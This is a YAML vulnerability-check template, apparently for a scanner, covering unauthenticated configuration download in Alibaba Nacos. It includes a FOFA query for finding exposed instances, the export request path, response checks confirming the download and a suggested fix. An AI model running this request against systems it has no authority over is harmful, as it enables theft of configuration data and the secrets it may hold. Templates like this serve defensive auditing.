product: Alibaba Nacos
vName: Nacos未授权配置信息下载
type: 信息泄漏
vID: [ ]
level: 3
vDesc: Nacos存在未授权文件下载，攻击者在不登录情况下可未授权下载系统配置文件
version: ''
note: ''
search:
  FOFA: title="Nacos" || icon_hash="13942501"
protocol: http
link: https://www.birdy02.com/2024/09/23/0d731b35-a0fa-4a02-955f-d60f465384fd
fix:
  - 对未授权访问页面做session认证，严格审核后台功能页面的访问权限，若为未登录用户则拒绝访问。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId=
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - PK
            logic: and
          header:
            value:
              - filename=nacos_config_export
            logic: and